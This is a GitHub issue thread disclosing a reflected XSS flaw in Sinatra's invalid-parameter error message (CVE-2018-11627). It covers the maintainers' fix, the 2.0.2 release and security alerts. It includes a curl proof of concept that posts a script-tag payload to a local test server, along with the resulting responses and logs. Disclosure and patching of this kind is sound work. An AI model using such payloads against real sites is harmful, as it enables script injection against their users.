XSS from params parser exception (status code : 400)

[JokerCatz]

source at :

sinatra/lib/sinatra/base.rb

Line 78 in 3fa1f2c

def params

def params
  super
rescue Rack::Utils::ParameterTypeError, Rack::Utils::InvalidParameterError => e
  raise BadRequest, "Invalid query parameters: #{e.message}"
end

demo code

# server.rb
require 'sinatra'
# yes ... it empty just require sinatra gem

call curl like

curl -i 'http://127.0.0.1:4567/' --data $'" %x\\"> <script>alert(1)</script>"'

return

HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=utf-8
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 81

Invalid query parameters: invalid %-encoding (" %x\"> <script>alert(1)</script>")

I know it 400 , but the error message can be HTML ... & no way to disable / filter it ...

and you can use code like this to overwrite it

module Sinatra
  class Request < Rack::Request
    def params
      super
    rescue Rack::Utils::ParameterTypeError, Rack::Utils::InvalidParameterError => e
      raise BadRequest, "404"
    end
  end
end

[namusyaka]

Really critical issue, thank you for the report.

This vulnerability has been added since this commit.
I'm going to fix this soon, also we should open the CVE about this.
/cc @jkowens

[jkowens]

The attached fix looks good 👍

[namusyaka]

CVE is here: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11627
I'm planning to cut next release v2.0.2 in a few days, thanks.

[rschultheis]

👋 I am Rob and I work on the GitHub team that sends vulnerability alerts. Since the CVE is now public, we'd like to send out alerts to users of sinatra <= 2.0.1.

We see here though that you're working on releasing 2.0.2 into RubyGems however. We plan to publish alerts an alert in the next 48 hours - can you advise on when you plan to release 2.0.2?

Thank you!

[namusyaka]

@rschultheis Sorry, Rob. We will release within a few hours from now.

[namusyaka]

Done.
See: https://twitter.com/namusyaka/status/1004045559307558912

[rschultheis]

Thank you for the quick turn around @namusyaka 🙇 . We've now started publishing alerts for the CVE.

[dentarg]

@namusyaka @rschultheis FYI Sinatra applications using 1.4.8 (and lower I guess) are also affected, when run as "modular" applications

see my repro at https://github.com/dentarg/gists/tree/master/gists/sinatra-CVE-2018-11627#cve-2018-11627

[dentarg]

My bad, the issue lies with rack 1.6.x. I will open the issue there.

[dentarg]

Hmm, rack 1.6.10 isn't vulnerable out-of-the-box. Might still be an issue with Sinatra?

[dentarg]

Ah, I see that it was discussed in #1070, to not release to the 1.x series.

[dentarg]

Ah, with RACK_ENV=production Sinatra 1.4.8 does not exhibit the problem.

$ RACK_ENV=production BUNDLE_GEMFILE=Gemfile-sinatra-1.4.8 bundle exec ruby modular_app.rb
[2018-06-07 13:51:27] INFO  WEBrick 1.3.1
[2018-06-07 13:51:27] INFO  ruby 2.4.2 (2017-09-14) [x86_64-darwin16]
== Sinatra (v1.4.8) has taken the stage on 4567 for production with backup from WEBrick
[2018-06-07 13:51:27] INFO  WEBrick::HTTPServer#start: pid=37252 port=4567
[2018-06-07 13:51:30] ERROR Rack::Utils::InvalidParameterError: invalid %-encoding (" %x\\"> <script>alert(1)</script>")
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/utils.rb:127:in `rescue in parse_nested_query'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/utils.rb:117:in `parse_nested_query'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/request.rb:371:in `parse_query'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/request.rb:215:in `POST'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/request.rb:230:in `params'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:902:in `call!'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:895:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/xss_header.rb:18:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/path_traversal.rb:16:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/json_csrf.rb:18:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/base.rb:49:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/base.rb:49:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-protection-1.5.5/lib/rack/protection/frame_options.rb:31:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/nulllogger.rb:9:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/head.rb:13:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:182:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:2013:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:1487:in `block in call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:1787:in `synchronize'
	/Users/dentarg/.gem/ruby/2.4.2/gems/sinatra-1.4.8/lib/sinatra/base.rb:1487:in `call'
	/Users/dentarg/.gem/ruby/2.4.2/gems/rack-1.6.10/lib/rack/handler/webrick.rb:88:in `service'
	/Users/dentarg/.rubies/ruby-2.4.2/lib/ruby/2.4.0/webrick/httpserver.rb:140:in `service'
	/Users/dentarg/.rubies/ruby-2.4.2/lib/ruby/2.4.0/webrick/httpserver.rb:96:in `run'
	/Users/dentarg/.rubies/ruby-2.4.2/lib/ruby/2.4.0/webrick/server.rb:290:in `block in start_thread'
127.0.0.1 - - [07/Jun/2018:13:51:30 CEST] "POST / HTTP/1.1" 500 365
- -> /
^C== Sinatra has ended his set (crowd applauds)
[2018-06-07 13:54:04] INFO  going to shutdown ...
[2018-06-07 13:54:04] INFO  WEBrick::HTTPServer#start done.

$ ./test.sh
+ curl --include http://127.0.0.1:4567/ --data '" %x\"> <script>alert(1)</script>"'
HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Server: WEBrick/1.3.1 (Ruby/2.4.2/2017-09-14)
Date: Thu, 07 Jun 2018 11:51:30 GMT
Content-Length: 365
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<HTML>
  <HEAD><TITLE>Internal Server Error</TITLE></HEAD>
  <BODY>
    <H1>Internal Server Error</H1>
    invalid %-encoding (&quot; %x\&quot;&gt; &lt;script&gt;alert(1)&lt;/script&gt;&quot;)
    <HR>
    <ADDRESS>
     WEBrick/1.3.1 (Ruby/2.4.2/2017-09-14) at
     127.0.0.1:4567
    </ADDRESS>
  </BODY>
</HTML>

[dentarg]

Ah, with RACK_ENV=production Sinatra 1.4.8 does not exhibit the problem.

...but Sinatra 2.0.1 does have the problem even with RACK_ENV=production (or APP_ENV).

Sorry for the noise, but maybe this saves someone else from playing 🕵️ themselves :)

[rschultheis]

Hi @dentarg,

The GitHub security alerts for CVE-2018-11627 are currently only going to repos that have sinatra 2.0.0 or 2.0.1 in their Gemfile and/or Gemfile.lock files. Since the CVE did not specify a minimum version, we did perform a very basic analysis to determine that the minimum non-beta version appears to be 2.0.0. If you have more insight onto what the correct minimum version for this vulnerability is we can update our data and alert the appropriate repos.

Thank you for the ping!

[dentarg]

@rschultheis I think you are correct in that minimum version for this vulnerability is 2.0.0. (However, I have only checked 1.4.8, not anything below that.)

[nutronex]

By the way, Is it possible to attack against other , I think so because form content-type "x-www-form-urlencoded" will encode < to %3c and "text/palin" will not work in sinatra in this case .